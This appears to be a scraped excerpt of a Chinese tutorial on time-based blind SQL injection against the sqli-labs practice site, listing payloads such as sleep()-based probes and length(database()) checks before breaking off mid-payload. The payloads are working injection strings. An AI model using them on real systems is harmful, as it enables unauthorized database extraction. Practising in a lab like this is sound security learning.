基于SQLI的SQL时间盲注

第一步 判断注入点与注入类型 ?id=1’ and sleep(10) %23 对比没有使用sleep()函数时的状态如下: 下面基于时间盲注进行数据库信息获取 第二步 获取数据库长度 id=1’ and if((length(database())=8),1,sleep(5)) %23 判断得数据库长度为8 第三步探测数据库其他信息 (1)判断数据库名 ?id=1’ and if(ascii(s
相关文章
相关标签/搜索